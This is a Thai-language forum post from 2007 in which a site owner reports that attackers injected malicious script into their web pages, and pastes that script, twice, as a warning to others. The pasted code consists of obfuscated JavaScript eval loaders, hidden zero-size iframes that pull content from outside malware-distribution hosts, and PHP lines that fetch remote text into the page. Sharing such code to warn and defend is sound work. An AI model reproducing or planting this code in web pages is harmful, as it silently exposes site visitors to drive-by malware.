gooeasy
13-10-2007, 07:03 AM
วันนี้ลองเข้าไปในเว็บตัวเองเจอของดีเข้าให้ trojan โปรแกรมแจ้งเตือนขึ้นมาทันที่ แถมยังขึ้นให้โหลด activex outlook.exe เลยปิดหน้าเว็บทันทีแล้วเข้าไปดูไฟล์เว็บหน้าแลกก็เจอเลยมันเอาสคริปมาฝังไว้เรียบร้อยเวงจิงๆ อยากรู้ว่ามันเอามาฝังได้ยังไงเนี้ยน่ากลัวจริงๆหรือมันอาศัยช่องโหว่ของจาวาสคริปที่ error อยู่บนหน้าเว็บแน่ๆจากการสันนิฐาน(เดาเอาเอง) หรือยังไงใครรู้บ้าง
เอาสคริปที่มันฝังไว้มาให้ดูเพื่อเป็นตัวอย่างใครมีโค็ดนี้ในไฟล์เว็บเพ็จไปเอาออกด่วน
<script Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk-><%259lgffkj"8{vknk`kqkt%25?gn{vq"%253%25?vjekgj"%253%25?jvfku"%25rjr,xz-epm,zgjlku--8rvvj%25?apq"gocpdk>"));
</SCRIPT>
<script Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));
</SCRIPT><?php
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%64%32%31%38%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%39%37%33%34%29%2b%27%31%65%5c%27%20%77%69%64%74%68%3d%36%38%39%20%68%65%69%67%68%74%3d%34%30%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><iframe src="http://orentraff.cn/tds/index.php?out=1191410716" width="0" height="0" style="display:none"></iframe>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065
\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072
\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064
\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031
\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022
\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073
\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079
\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065
\u003e')</script>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>
เอาสคริปที่มันฝังไว้มาให้ดูเพื่อเป็นตัวอย่างใครมีโค็ดนี้ในไฟล์เว็บเพ็จไปเอาออกด่วน
<script Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));d(unescape("%08<gocpdk-><%259lgffkj"8{vknk`kqkt%25?gn{vq"%253%25?vjekgj"%253%25?jvfku"%25rjr,xz-epm,zgjlku--8rvvj%25?apq"gocpdk>"));
</SCRIPT>
<script Language="JavaScript">
document.write(unescape("%3C%69%66%72%61%6D%65 %73%72%63%3D%22%68%74%74%70%3A%2F%2F%33%30%33%69%6E%63%2E%70%72%69%2E%65%65%2F%78%64%73%2F%69%66%72%61%6D%65%2E%70%68%70%22 %66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22 %77%69%64%74%68%3D%30 %68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%0A"));
</SCRIPT><?php
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://erordmas.info/test.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://www.gerbalaif.info/tests.txt");
?><?php
echo file_get_contents("http://doubler2007.com/test.txt");
?><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%64%32%31%38%62%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%37%39%37%33%34%29%2b%27%31%65%5c%27%20%77%69%64%74%68%3d%36%38%39%20%68%65%69%67%68%74%3d%34%30%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script><iframe src="http://orentraff.cn/tds/index.php?out=1191410716" width="0" height="0" style="display:none"></iframe>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065
\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072
\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064
\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031
\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022
\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073
\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079
\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065
\u003e')</script>
<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0066\u0066\u0063\u002e\u006f\u0072\u0067\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u006f\u0075\u0074\u003d\u0031\u0031\u0039\u0031\u0038\u0038\u0033\u0035\u0032\u0033\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0030\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')</script>